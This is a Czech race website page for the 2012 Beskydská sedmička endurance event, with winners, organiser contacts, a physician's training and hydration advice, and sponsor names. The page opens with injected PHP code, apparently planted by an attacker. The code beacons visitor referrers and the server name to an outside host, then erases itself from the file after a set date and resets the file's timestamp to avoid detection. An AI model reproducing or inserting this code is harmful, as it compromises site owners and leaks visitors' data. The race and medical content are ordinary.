check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735874){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } RADY LÉKAŘE ADIDAS TERREX - CONTINENTAL BESKYDSKÉ SEDMIČKY 2012
           
www.continental.cz
M ČR V HORSKÉM MARATONU DVOJIC
EXTRÉMNÍ PŘECHOD BESKYD - JAVOROVÝ - JAVORNÍK 2012
HLAVNÍ STRÁNKAVÝSLEDKOVÁ LISTINAINFO ZE ZÁVODUMÉDIA / PRESSFOTOGALERIE

VÍTĚZNÉ TÝMY MČR

1.MÍSTO
194 - SALOMON-RUN
PETREČEK TOMÁŠ
ŠTRYNCL PAVEL

ČAS VÍTĚZE: 13:05:04

2.MÍSTO
117 - SLS3-SKVK
CYPRA ZBYNĚK
VABROUŠEK PETR
ČAS: 13:13:31

3.MÍSTO
253 - L4L5S1
POLÁK VLADIMÍR
NAHORNIAK TOMÁŠ
ČAS: 13:51:24 

UPOUTÁVKY 2012

BESKYDSKÁ SEDMIČKA - 2012


REGISTRACE B7 - 2012


INLINE 24 - 2012


LH 24 - 2012

KONTAKT NA ORGANIZAČNÍ TEAM:
Pořadatel akce SK K2 o.s., Libor Uher
Česká asociace extrémních
sportů - ČAES

Vedení závodu
Libor Uher
+420 608 228 227
libor@beskydskasedmicka.cz

Jana Matějíková
presscentrum
+420 602 936 634
info@beskydskasedmicka.cz


MUDr. Radomír Maráček
organizační tým B7, doprava, lékař
rm@beskydskasedmicka.cz


Registrace závodu

Kateřina Uhrová
+420 603 228 228
registrace@beskydska
sedmicka.cz


Marian Žárský
kulturní program Frenštát
marian@beskydskasedmicka.cz


Martina Filipová

organizační tým B7
martina@beskydskasedmicka.cz


Tomáš Janeček

grafika, web, technik
+420 777 712 747
tomas@beskydskasedmicka.cz


Iveta Nakoukalová

dobrovolníci, akreditace
iveta@beskydskasedmicka.cz


Mirek Prašivka

všechno ostatní :-)

Tomáš Zatloukal
doprava pořadatelů

Petr Kalina
značení a úklid trati

Dušan Klimek
technické zajištění Frenštát



RADY LÉKAŘE ADIDAS TERREX - CONTINENTAL BESKYDSKÉ SEDMIČKY 2012

Protože se jedná o náročnou vytrvalostní aktivitu s individuální intenzitou, požádali jsme našeho lékaře MUDr. Radomíra Maráčka z Kliniky sportovní medicíny, aby sepsal několik základních rad a doporučení pro závodníky Beskydské sedmičky a nejen pro ně...

Příprava

Jedná se o náročnou vytrvalostní aktivitu s individuální intenzitou (rychlostí pohybu), a proto je důležitá dlouhodobá příprava v několikahodinových trénincích v chůzi, na kole a běhu. 
 Chůze je důležitá nejméně v posledních třech týdnech, a to z důvodu adaptace svalovo-kosterního systému. Je vždy nutno dbát na dostatečný pitný režim a energetický příjem. Je potřeba vyzkoušet stravu, kterou budete používat při
závodě.
 Neměli bychom zapomínat na aktivní regeneraci (strečink, plavání) a pasivní regeneraci (masáže, sauna, výřivky). 
 Mít a vyzkoušet vhodné vybavení pro všechny druhy možného počasí. Kvalitní vyzkoušená obuv (prevence otlaků a puchýřů), vyzkoušené ponožky, v případě slunečného počasí pokrývka hlavy a slunečné brýle, za špatného počasí nepromokavé boty s návleky, nepromokavá bunda, pláštěnka. 


Vždy funkční oblečení. Množství a charakter oblečení bude záviset na rychlosti pohybu. Nejvíce budou zatížena chodidla, a proto potřebují náležitou péči. Kdo je připraven není překvapen.

 

V průběhu

Nasazení vhodného tempa! Vzhledem k délce závodu velmi podstatné. Dle rychlosti se bude odvíjet i energetická potřeba v zástoupení cukrů, bílkovin a tuků. Platí pravidlo, čím rychleji, tím více cukrů, a to ve vhodné kombinaci těch s nízkým a vysokým glykemickým indexem užitých pravidelně a včas, ne až “dojde”.
Ideální je kombinace různých “barů, tyček a gelů, kde je uveden glykemický index a nejvhodnější použití a navíc bývají obohaceny o vitamíny, stopové prvky a ionty, včetně menšího množství bílkovin. Tuku máme na tuto akci všichni dost. Ti, kteří projdou zátěžovým vyšetřením, by se měli pohybovat do kopce do anaerobního prahu a při sestupu v oblasti aerobního prahu.
 Dostatečný pitný režim – dle počasí
250-500 ml/hodinu. Nejvhodněji iontové hypotonické nápoje. 
 Velkou výhodou je použití holí. Je vhodné, pokud to pro Vás bude možné a máte rychlostní ambice kombinovat chůzi a běh (rovinky, z mírnějšího kopce). Nezapomeňte, že třetí ročník se jde opačně.


Po zátěži

Ihned maximalizovaný pitný režim až do zvýšené produkce moči. Doplnění cukerných zásob, a to bezprostředně po ukončení závodu s pokračováním do 2 hodin s přídavkem bílkovin. Vhodné použít komerčně vyráběné regenerační přípravky následně s lehkým jídlem. Protahování, masáž, regenerační krémy.


Doporučení:

Návštěva sportovního nebo tělovýchovného lékaře ke zhodnocení kardiovaskulárního, dýchacího a svalového systému se stanovením výkonnosti, změřením prahů a doporučením intenzity zátěže. U lidí, kteří užívají léky na srdce, tlak či jiné léky, by bylo vhodné navštívit svého lékaře specialistu nebo tělovýchovného lékaře.
 Sport je i pro nemocné, je pro ně ve vhodném objemu a intenzitě lékem. Obzvlášť chůze v přírodě. To, že nejsme uplně zdraví, musíme vědet. Zjistit to při závodě už muže být pozdě. Cestou je křížků už dost.

 

GENERÁLNÍ PARTNEŘI

adidas


1511


PARTNEŘI

IBS    
Frenštát pod Radhoštěm


www.rajpneu.cz



Author




I style









 

black


Nutrend

radegast


 
 



 

black


 


 

Suunto


 

 



Frýdek-Místek     Obec Ostravice

 

       

  

Opavanet

 

Sportovní medicína

 
 

Mapy Shokart





 

Author




In agency    



Škola - Frenštát pod Radhoštěm SK Valašské království


KLUB ČESKÝCH TURISTŮ










 

CAES


CAES

CAES